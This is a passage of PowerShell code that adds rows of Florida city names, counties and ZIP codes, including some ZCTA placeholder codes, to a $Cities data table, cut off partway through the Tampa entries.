$Cities.Rows.Add("Melrose","Putnam","Florida","FL","12","32666") + $null = $Cities.Rows.Add("Micanopy","Alachua","Florida","FL","12","32667") + $null = $Cities.Rows.Add("Morriston","Levy","Florida","FL","12","32668") + $null = $Cities.Rows.Add("Newberry","Alachua","Florida","FL","12","32669") + $null = $Cities.Rows.Add("Old town","Dixie","Florida","FL","12","32680") + $null = $Cities.Rows.Add("Orange lake","Marion","Florida","FL","12","32681") + $null = $Cities.Rows.Add("Otter creek","Levy","Florida","FL","12","32683") + $null = $Cities.Rows.Add("Reddick","Marion","Florida","FL","12","32686") + $null = $Cities.Rows.Add("Suwannee","Dixie","Florida","FL","12","32692") + $null = $Cities.Rows.Add("Trenton","Gilchrist","Florida","FL","12","32693") + $null = $Cities.Rows.Add("Waldo","Alachua","Florida","FL","12","32694") + $null = $Cities.Rows.Add("Williston","Levy","Florida","FL","12","32696") + $null = $Cities.Rows.Add("Worthington spri","Union","Florida","FL","12","32697") + $null = $Cities.Rows.Add("Zcta 326hh","Alachua","Florida","FL","12","326HH") + $null = $Cities.Rows.Add("Zcta 326xx","Dixie","Florida","FL","12","326XX") + $null = $Cities.Rows.Add("Altamonte spring","Seminole","Florida","FL","12","32701") + $null = $Cities.Rows.Add("Altoona","Lake","Florida","FL","12","32702") + $null = $Cities.Rows.Add("Hunt club","Orange","Florida","FL","12","32703") + $null = $Cities.Rows.Add("Cassadaga","Volusia","Florida","FL","12","32706") + $null = $Cities.Rows.Add("Casselberry","Seminole","Florida","FL","12","32707") + $null = $Cities.Rows.Add("Winter springs","Seminole","Florida","FL","12","32708") + $null = $Cities.Rows.Add("Christmas","Orange","Florida","FL","12","32709") + $null = $Cities.Rows.Add("Apopka","Orange","Florida","FL","12","32712") + $null = $Cities.Rows.Add("Debary","Volusia","Florida","FL","12","32713") + $null = $Cities.Rows.Add("Forest city","Seminole","Florida","FL","12","32714") + $null = $Cities.Rows.Add("Deland","Volusia","Florida","FL","12","32720") + $null = $Cities.Rows.Add("Deland","Volusia","Florida","FL","12","32724") + $null = $Cities.Rows.Add("Deltona","Volusia","Florida","FL","12","32725") + $null = $Cities.Rows.Add("Eustis","Lake","Florida","FL","12","32726") + $null = $Cities.Rows.Add("Fern park","Seminole","Florida","FL","12","32730") + $null = $Cities.Rows.Add("Geneva","Seminole","Florida","FL","12","32732") + $null = $Cities.Rows.Add("Grand island","Lake","Florida","FL","12","32735") + $null = $Cities.Rows.Add("Zcta 32736","Lake","Florida","FL","12","32736") + $null = $Cities.Rows.Add("Deltona","Volusia","Florida","FL","12","32738") + $null = $Cities.Rows.Add("Lake helen","Volusia","Florida","FL","12","32744") + $null = $Cities.Rows.Add("Heathrow","Seminole","Florida","FL","12","32746") + $null = $Cities.Rows.Add("Longwood","Seminole","Florida","FL","12","32750") + $null = $Cities.Rows.Add("Eatonville","Orange","Florida","FL","12","32751") + $null = $Cities.Rows.Add("Mims","Brevard","Florida","FL","12","32754") + $null = $Cities.Rows.Add("Mount dora","Lake","Florida","FL","12","32757") + $null = $Cities.Rows.Add("Oak hill","Volusia","Florida","FL","12","32759") + $null = $Cities.Rows.Add("Orange city","Volusia","Florida","FL","12","32763") + $null = $Cities.Rows.Add("Osteen","Volusia","Florida","FL","12","32764") + $null = $Cities.Rows.Add("Oviedo","Seminole","Florida","FL","12","32765") + $null = $Cities.Rows.Add("Chuluota","Seminole","Florida","FL","12","32766") + $null = $Cities.Rows.Add("Paisley","Lake","Florida","FL","12","32767") + $null = $Cities.Rows.Add("Sanford","Seminole","Florida","FL","12","32771") + $null = $Cities.Rows.Add("Sanford","Seminole","Florida","FL","12","32773") + $null = $Cities.Rows.Add("Scottsmoor","Brevard","Florida","FL","12","32775") + $null = $Cities.Rows.Add("Sorrento","Lake","Florida","FL","12","32776") + $null = $Cities.Rows.Add("Tavares","Lake","Florida","FL","12","32778") + $null = $Cities.Rows.Add("Springs plaza","Seminole","Florida","FL","12","32779") + $null = $Cities.Rows.Add("Titusville","Brevard","Florida","FL","12","32780") + $null = $Cities.Rows.Add("Dona vista","Lake","Florida","FL","12","32784") + $null = $Cities.Rows.Add("Winter park","Orange","Florida","FL","12","32789") + $null = $Cities.Rows.Add("Aloma","Orange","Florida","FL","12","32792") + $null = $Cities.Rows.Add("Titusville","Brevard","Florida","FL","12","32796") + $null = $Cities.Rows.Add("Zellwood","Orange","Florida","FL","12","32798") + $null = $Cities.Rows.Add("Zcta 327hh","Brevard","Florida","FL","12","327HH") + $null = $Cities.Rows.Add("Zcta 327xx","Brevard","Florida","FL","12","327XX") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32801") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32803") + $null = $Cities.Rows.Add("Fairvilla","Orange","Florida","FL","12","32804") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32805") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32806") + $null = $Cities.Rows.Add("Azalea park","Orange","Florida","FL","12","32807") + $null = $Cities.Rows.Add("Pine hills","Orange","Florida","FL","12","32808") + $null = $Cities.Rows.Add("Pine castle","Orange","Florida","FL","12","32809") + $null = $Cities.Rows.Add("Lockhart","Orange","Florida","FL","12","32810") + $null = $Cities.Rows.Add("Orlo vista","Orange","Florida","FL","12","32811") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32812") + $null = $Cities.Rows.Add("Union park","Orange","Florida","FL","12","32817") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32818") + $null = $Cities.Rows.Add("Sand lake","Orange","Florida","FL","12","32819") + $null = $Cities.Rows.Add("Union park","Orange","Florida","FL","12","32820") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32821") + $null = $Cities.Rows.Add("Ventura","Orange","Florida","FL","12","32822") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32824") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32825") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32826") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32827") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32828") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32829") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32831") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32832") + $null = $Cities.Rows.Add("Union park","Orange","Florida","FL","12","32833") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32835") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32836") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32837") + $null = $Cities.Rows.Add("Orlando","Orange","Florida","FL","12","32839") + $null = $Cities.Rows.Add("Zcta 328hh","Orange","Florida","FL","12","328HH") + $null = $Cities.Rows.Add("Melbourne","Brevard","Florida","FL","12","32901") + $null = $Cities.Rows.Add("Indialantic","Brevard","Florida","FL","12","32903") + $null = $Cities.Rows.Add("Melbourne villag","Brevard","Florida","FL","12","32904") + $null = $Cities.Rows.Add("Palm bay","Brevard","Florida","FL","12","32905") + $null = $Cities.Rows.Add("Palm bay","Brevard","Florida","FL","12","32907") + $null = $Cities.Rows.Add("Palm bay","Brevard","Florida","FL","12","32908") + $null = $Cities.Rows.Add("Palm bay","Brevard","Florida","FL","12","32909") + $null = $Cities.Rows.Add("Cape canaveral","Brevard","Florida","FL","12","32920") + $null = $Cities.Rows.Add("Cocoa","Brevard","Florida","FL","12","32922") + $null = $Cities.Rows.Add("Patrick a f b","Brevard","Florida","FL","12","32925") + $null = $Cities.Rows.Add("Cocoa","Brevard","Florida","FL","12","32926") + $null = $Cities.Rows.Add("Port saint john","Brevard","Florida","FL","12","32927") + $null = $Cities.Rows.Add("Cocoa beach","Brevard","Florida","FL","12","32931") + $null = $Cities.Rows.Add("Eau gallie","Brevard","Florida","FL","12","32934") + $null = $Cities.Rows.Add("Melbourne","Brevard","Florida","FL","12","32935") + $null = $Cities.Rows.Add("Indian harbor be","Brevard","Florida","FL","12","32937") + $null = $Cities.Rows.Add("Melbourne","Brevard","Florida","FL","12","32940") + $null = $Cities.Rows.Add("Fellsmere","Indian River","Florida","FL","12","32948") + $null = $Cities.Rows.Add("Grant","Brevard","Florida","FL","12","32949") + $null = $Cities.Rows.Add("Malabar","Brevard","Florida","FL","12","32950") + $null = $Cities.Rows.Add("Melbourne beach","Brevard","Florida","FL","12","32951") + $null = $Cities.Rows.Add("Merritt island","Brevard","Florida","FL","12","32952") + $null = $Cities.Rows.Add("Merritt island","Brevard","Florida","FL","12","32953") + $null = $Cities.Rows.Add("Rockledge","Brevard","Florida","FL","12","32955") + $null = $Cities.Rows.Add("Sebastian","Indian River","Florida","FL","12","32958") + $null = $Cities.Rows.Add("Vero beach","Indian River","Florida","FL","12","32960") + $null = $Cities.Rows.Add("Vero beach","Indian River","Florida","FL","12","32962") + $null = $Cities.Rows.Add("Indian river sho","Indian River","Florida","FL","12","32963") + $null = $Cities.Rows.Add("Vero beach","Indian River","Florida","FL","12","32966") + $null = $Cities.Rows.Add("Vero beach","Indian River","Florida","FL","12","32967") + $null = $Cities.Rows.Add("Vero beach","Indian River","Florida","FL","12","32968") + $null = $Cities.Rows.Add("Wabasso","Indian River","Florida","FL","12","32970") + $null = $Cities.Rows.Add("Barefoot bay","Brevard","Florida","FL","12","32976") + $null = $Cities.Rows.Add("Zcta 329hh","Brevard","Florida","FL","12","329HH") + $null = $Cities.Rows.Add("Zcta 329xx","Brevard","Florida","FL","12","329XX") + $null = $Cities.Rows.Add("Long key","Monroe","Florida","FL","12","33001") + $null = $Cities.Rows.Add("Dania","Broward","Florida","FL","12","33004") + $null = $Cities.Rows.Add("Hallandale","Broward","Florida","FL","12","33009") + $null = $Cities.Rows.Add("Hialeah","Miami-Dade","Florida","FL","12","33010") + $null = $Cities.Rows.Add("Hialeah","Miami-Dade","Florida","FL","12","33012") + $null = $Cities.Rows.Add("Hialeah","Miami-Dade","Florida","FL","12","33013") + $null = $Cities.Rows.Add("Hialeah","Miami-Dade","Florida","FL","12","33014") + $null = $Cities.Rows.Add("Hialeah","Miami-Dade","Florida","FL","12","33015") + $null = $Cities.Rows.Add("Hialeah","Miami-Dade","Florida","FL","12","33016") + $null = $Cities.Rows.Add("Zcta 33018","Miami-Dade","Florida","FL","12","33018") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33019") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33020") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33021") + $null = $Cities.Rows.Add("Miramar","Broward","Florida","FL","12","33023") + $null = $Cities.Rows.Add("Pembroke pines","Broward","Florida","FL","12","33024") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33025") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33026") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33027") + $null = $Cities.Rows.Add("Hollywood","Broward","Florida","FL","12","33028") + $null = $Cities.Rows.Add("Pembroke pines","Broward","Florida","FL","12","33029") + $null = $Cities.Rows.Add("Homestead","Miami-Dade","Florida","FL","12","33030") + $null = $Cities.Rows.Add("Homestead","Miami-Dade","Florida","FL","12","33031") + $null = $Cities.Rows.Add("Princeton","Miami-Dade","Florida","FL","12","33032") + $null = $Cities.Rows.Add("Homestead","Miami-Dade","Florida","FL","12","33033") + $null = $Cities.Rows.Add("Florida city","Miami-Dade","Florida","FL","12","33034") + $null = $Cities.Rows.Add("Homestead","Miami-Dade","Florida","FL","12","33035") + $null = $Cities.Rows.Add("Islamorada","Monroe","Florida","FL","12","33036") + $null = $Cities.Rows.Add("Ocean reef","Monroe","Florida","FL","12","33037") + $null = $Cities.Rows.Add("Naval air statio","Monroe","Florida","FL","12","33040") + $null = $Cities.Rows.Add("Summerland key","Monroe","Florida","FL","12","33042") + $null = $Cities.Rows.Add("Big pine key","Monroe","Florida","FL","12","33043") + $null = $Cities.Rows.Add("Marathon","Monroe","Florida","FL","12","33050") + $null = $Cities.Rows.Add("Opa locka","Miami-Dade","Florida","FL","12","33054") + $null = $Cities.Rows.Add("Carol city","Miami-Dade","Florida","FL","12","33055") + $null = $Cities.Rows.Add("Carol city","Miami-Dade","Florida","FL","12","33056") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33060") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33062") + $null = $Cities.Rows.Add("Margate","Broward","Florida","FL","12","33063") + $null = $Cities.Rows.Add("Lighthouse point","Broward","Florida","FL","12","33064") + $null = $Cities.Rows.Add("Coral springs","Broward","Florida","FL","12","33065") + $null = $Cities.Rows.Add("Margate","Broward","Florida","FL","12","33066") + $null = $Cities.Rows.Add("North coral spri","Broward","Florida","FL","12","33067") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33068") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33069") + $null = $Cities.Rows.Add("Tavernier","Monroe","Florida","FL","12","33070") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33071") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33073") + $null = $Cities.Rows.Add("Pompano beach","Broward","Florida","FL","12","33076") + $null = $Cities.Rows.Add("Zcta 330hh","Broward","Florida","FL","12","330HH") + $null = $Cities.Rows.Add("Zcta 330xx","Broward","Florida","FL","12","330XX") + $null = $Cities.Rows.Add("Miami beach","Miami-Dade","Florida","FL","12","33109") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33122") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33125") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33126") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33127") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33128") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33129") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33130") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33131") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33132") + $null = $Cities.Rows.Add("Coral gables","Miami-Dade","Florida","FL","12","33133") + $null = $Cities.Rows.Add("Coral gables","Miami-Dade","Florida","FL","12","33134") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33135") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33136") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33137") + $null = $Cities.Rows.Add("Miami shores","Miami-Dade","Florida","FL","12","33138") + $null = $Cities.Rows.Add("Carl fisher","Miami-Dade","Florida","FL","12","33139") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33140") + $null = $Cities.Rows.Add("North bay villag","Miami-Dade","Florida","FL","12","33141") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33142") + $null = $Cities.Rows.Add("South miami","Miami-Dade","Florida","FL","12","33143") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33144") + $null = $Cities.Rows.Add("Coral gables","Miami-Dade","Florida","FL","12","33145") + $null = $Cities.Rows.Add("Coral gables","Miami-Dade","Florida","FL","12","33146") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33147") + $null = $Cities.Rows.Add("Key biscayne","Miami-Dade","Florida","FL","12","33149") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33150") + $null = $Cities.Rows.Add("Bal harbour","Miami-Dade","Florida","FL","12","33154") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33155") + $null = $Cities.Rows.Add("Kendall","Miami-Dade","Florida","FL","12","33156") + $null = $Cities.Rows.Add("Perrine","Miami-Dade","Florida","FL","12","33157") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33158") + $null = $Cities.Rows.Add("North miami beac","Miami-Dade","Florida","FL","12","33160") + $null = $Cities.Rows.Add("North miami","Miami-Dade","Florida","FL","12","33161") + $null = $Cities.Rows.Add("North miami beac","Miami-Dade","Florida","FL","12","33162") + $null = $Cities.Rows.Add("Olympia heights","Miami-Dade","Florida","FL","12","33165") + $null = $Cities.Rows.Add("Miami springs","Miami-Dade","Florida","FL","12","33166") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33167") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33168") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33169") + $null = $Cities.Rows.Add("Quail heights","Miami-Dade","Florida","FL","12","33170") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33172") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33173") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33174") + $null = $Cities.Rows.Add("Olympia heights","Miami-Dade","Florida","FL","12","33175") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33176") + $null = $Cities.Rows.Add("Quail heights","Miami-Dade","Florida","FL","12","33177") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33178") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33179") + $null = $Cities.Rows.Add("Ojus","Miami-Dade","Florida","FL","12","33180") + $null = $Cities.Rows.Add("North miami beac","Miami-Dade","Florida","FL","12","33181") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33182") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33183") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33184") + $null = $Cities.Rows.Add("Olympia heights","Miami-Dade","Florida","FL","12","33185") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33186") + $null = $Cities.Rows.Add("Quail heights","Miami-Dade","Florida","FL","12","33187") + $null = $Cities.Rows.Add("Quail heights","Miami-Dade","Florida","FL","12","33189") + $null = $Cities.Rows.Add("Quail heights","Miami-Dade","Florida","FL","12","33190") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33193") + $null = $Cities.Rows.Add("Olympia heights","Miami-Dade","Florida","FL","12","33194") + $null = $Cities.Rows.Add("Miami","Miami-Dade","Florida","FL","12","33196") + $null = $Cities.Rows.Add("Zcta 331hh","Miami-Dade","Florida","FL","12","331HH") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33301") + $null = $Cities.Rows.Add("Oakland park","Broward","Florida","FL","12","33304") + $null = $Cities.Rows.Add("Oakland park","Broward","Florida","FL","12","33305") + $null = $Cities.Rows.Add("Oakland park","Broward","Florida","FL","12","33306") + $null = $Cities.Rows.Add("Oakland park","Broward","Florida","FL","12","33308") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33309") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33311") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33312") + $null = $Cities.Rows.Add("City of sunrise","Broward","Florida","FL","12","33313") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33314") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33315") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33316") + $null = $Cities.Rows.Add("Plantation","Broward","Florida","FL","12","33317") + $null = $Cities.Rows.Add("Tamarac","Broward","Florida","FL","12","33319") + $null = $Cities.Rows.Add("Tamarac","Broward","Florida","FL","12","33321") + $null = $Cities.Rows.Add("Sunrise","Broward","Florida","FL","12","33322") + $null = $Cities.Rows.Add("Sunrise","Broward","Florida","FL","12","33323") + $null = $Cities.Rows.Add("Plantation","Broward","Florida","FL","12","33324") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33325") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33326") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33327") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33328") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33330") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33331") + $null = $Cities.Rows.Add("Davie","Broward","Florida","FL","12","33332") + $null = $Cities.Rows.Add("Oakland park","Broward","Florida","FL","12","33334") + $null = $Cities.Rows.Add("Tamarac","Broward","Florida","FL","12","33351") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33388") + $null = $Cities.Rows.Add("Fort lauderdale","Broward","Florida","FL","12","33394") + $null = $Cities.Rows.Add("Zcta 333hh","Broward","Florida","FL","12","333HH") + $null = $Cities.Rows.Add("Zcta 333xx","Miami-Dade","Florida","FL","12","333XX") + $null = $Cities.Rows.Add("West palm beach","Palm Beach","Florida","FL","12","33401") + $null = $Cities.Rows.Add("Lake park","Palm Beach","Florida","FL","12","33403") + $null = $Cities.Rows.Add("Riviera beach","Palm Beach","Florida","FL","12","33404") + $null = $Cities.Rows.Add("West palm beach","Palm Beach","Florida","FL","12","33405") + $null = $Cities.Rows.Add("Glen ridge","Palm Beach","Florida","FL","12","33406") + $null = $Cities.Rows.Add("West palm beach","Palm Beach","Florida","FL","12","33407") + $null = $Cities.Rows.Add("North palm beach","Palm Beach","Florida","FL","12","33408") + $null = $Cities.Rows.Add("Haverhill","Palm Beach","Florida","FL","12","33409") + $null = $Cities.Rows.Add("Palm beach garde","Palm Beach","Florida","FL","12","33410") + $null = $Cities.Rows.Add("Royal palm beach","Palm Beach","Florida","FL","12","33411") + $null = $Cities.Rows.Add("West palm beach","Palm Beach","Florida","FL","12","33412") + $null = $Cities.Rows.Add("West palm beach","Palm Beach","Florida","FL","12","33413") + $null = $Cities.Rows.Add("West palm beach","Palm Beach","Florida","FL","12","33414") + $null = $Cities.Rows.Add("Haverhill","Palm Beach","Florida","FL","12","33415") + $null = $Cities.Rows.Add("Haverhill","Palm Beach","Florida","FL","12","33417") + $null = $Cities.Rows.Add("Palm beach garde","Palm Beach","Florida","FL","12","33418") + $null = $Cities.Rows.Add("Boynton beach","Palm Beach","Florida","FL","12","33426") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33428") + $null = $Cities.Rows.Add("Belle glade","Palm Beach","Florida","FL","12","33430") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33431") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33432") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33433") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33434") + $null = $Cities.Rows.Add("Briny breezes","Palm Beach","Florida","FL","12","33435") + $null = $Cities.Rows.Add("Village of golf","Palm Beach","Florida","FL","12","33436") + $null = $Cities.Rows.Add("Boynton beach","Palm Beach","Florida","FL","12","33437") + $null = $Cities.Rows.Add("Canal point","Palm Beach","Florida","FL","12","33438") + $null = $Cities.Rows.Add("Clewiston","Hendry","Florida","FL","12","33440") + $null = $Cities.Rows.Add("Deerfield beach","Broward","Florida","FL","12","33441") + $null = $Cities.Rows.Add("Deerfield beach","Broward","Florida","FL","12","33442") + $null = $Cities.Rows.Add("Delray beach","Palm Beach","Florida","FL","12","33444") + $null = $Cities.Rows.Add("Delray beach","Palm Beach","Florida","FL","12","33445") + $null = $Cities.Rows.Add("Delray beach","Palm Beach","Florida","FL","12","33446") + $null = $Cities.Rows.Add("Hobe sound","Martin","Florida","FL","12","33455") + $null = $Cities.Rows.Add("Jupiter","Palm Beach","Florida","FL","12","33458") + $null = $Cities.Rows.Add("Lake worth","Palm Beach","Florida","FL","12","33460") + $null = $Cities.Rows.Add("Lake worth","Palm Beach","Florida","FL","12","33461") + $null = $Cities.Rows.Add("Lantana","Palm Beach","Florida","FL","12","33462") + $null = $Cities.Rows.Add("Greenacres","Palm Beach","Florida","FL","12","33463") + $null = $Cities.Rows.Add("Lake worth","Palm Beach","Florida","FL","12","33467") + $null = $Cities.Rows.Add("Tequesta","Palm Beach","Florida","FL","12","33469") + $null = $Cities.Rows.Add("Loxahatchee","Palm Beach","Florida","FL","12","33470") + $null = $Cities.Rows.Add("Moore haven","Glades","Florida","FL","12","33471") + $null = $Cities.Rows.Add("Pahokee","Palm Beach","Florida","FL","12","33476") + $null = $Cities.Rows.Add("Jupiter","Palm Beach","Florida","FL","12","33477") + $null = $Cities.Rows.Add("Jupiter","Palm Beach","Florida","FL","12","33478") + $null = $Cities.Rows.Add("Palm beach","Palm Beach","Florida","FL","12","33480") + $null = $Cities.Rows.Add("Delray beach","Palm Beach","Florida","FL","12","33483") + $null = $Cities.Rows.Add("Delray beach","Palm Beach","Florida","FL","12","33484") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33486") + $null = $Cities.Rows.Add("Highland beach","Palm Beach","Florida","FL","12","33487") + $null = $Cities.Rows.Add("South bay","Palm Beach","Florida","FL","12","33493") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33496") + $null = $Cities.Rows.Add("Boca raton","Palm Beach","Florida","FL","12","33498") + $null = $Cities.Rows.Add("Zcta 334hh","Broward","Florida","FL","12","334HH") + $null = $Cities.Rows.Add("Zcta 334xx","Hendry","Florida","FL","12","334XX") + $null = $Cities.Rows.Add("Brandon","Hillsborough","Florida","FL","12","33510") + $null = $Cities.Rows.Add("Brandon","Hillsborough","Florida","FL","12","33511") + $null = $Cities.Rows.Add("Bushnell","Sumter","Florida","FL","12","33513") + $null = $Cities.Rows.Add("Center hill","Sumter","Florida","FL","12","33514") + $null = $Cities.Rows.Add("Coleman","Sumter","Florida","FL","12","33521") + $null = $Cities.Rows.Add("Zcta 33523","Pasco","Florida","FL","12","33523") + $null = $Cities.Rows.Add("Ridge manor","Pasco","Florida","FL","12","33525") + $null = $Cities.Rows.Add("Dover","Hillsborough","Florida","FL","12","33527") + $null = $Cities.Rows.Add("Gibsonton","Hillsborough","Florida","FL","12","33534") + $null = $Cities.Rows.Add("Lake panasoffkee","Sumter","Florida","FL","12","33538") + $null = $Cities.Rows.Add("Zephyrhills","Pasco","Florida","FL","12","33540") + $null = $Cities.Rows.Add("Zephyrhills","Pasco","Florida","FL","12","33541") + $null = $Cities.Rows.Add("Wesley chapel","Pasco","Florida","FL","12","33543") + $null = $Cities.Rows.Add("Zephyrhills","Pasco","Florida","FL","12","33544") + $null = $Cities.Rows.Add("Lithia","Hillsborough","Florida","FL","12","33547") + $null = $Cities.Rows.Add("Lutz","Hillsborough","Florida","FL","12","33549") + $null = $Cities.Rows.Add("Odessa","Hillsborough","Florida","FL","12","33556") + $null = $Cities.Rows.Add("Plant city","Hillsborough","Florida","FL","12","33565") + $null = $Cities.Rows.Add("Plant city","Hillsborough","Florida","FL","12","33566") + $null = $Cities.Rows.Add("Plant city","Hillsborough","Florida","FL","12","33567") + $null = $Cities.Rows.Add("Riverview","Hillsborough","Florida","FL","12","33569") + $null = $Cities.Rows.Add("Ruskin","Hillsborough","Florida","FL","12","33570") + $null = $Cities.Rows.Add("Apollo beach","Hillsborough","Florida","FL","12","33572") + $null = $Cities.Rows.Add("Sun city center","Hillsborough","Florida","FL","12","33573") + $null = $Cities.Rows.Add("San antonio","Pasco","Florida","FL","12","33576") + $null = $Cities.Rows.Add("Seffner","Hillsborough","Florida","FL","12","33584") + $null = $Cities.Rows.Add("Sumterville","Sumter","Florida","FL","12","33585") + $null = $Cities.Rows.Add("Thonotosassa","Hillsborough","Florida","FL","12","33592") + $null = $Cities.Rows.Add("Valrico","Hillsborough","Florida","FL","12","33594") + $null = $Cities.Rows.Add("Ridge manor esta","Sumter","Florida","FL","12","33597") + $null = $Cities.Rows.Add("Wimauma","Hillsborough","Florida","FL","12","33598") + $null = $Cities.Rows.Add("Zcta 335hh","Hillsborough","Florida","FL","12","335HH") + $null = $Cities.Rows.Add("Zcta 335xx","Sumter","Florida","FL","12","335XX") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33602") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33603") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33604") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33605") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33606") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33607") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33609") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33610") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33611") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33612") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33613") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33614") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33615") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33616") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33617") + $null = $Cities.Rows.Add("Carrollwood","Hillsborough","Florida","FL","12","33618") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33619") + $null = $Cities.Rows.Add("Tampa","Hillsborough","Florida","FL","12","33620") + $null = 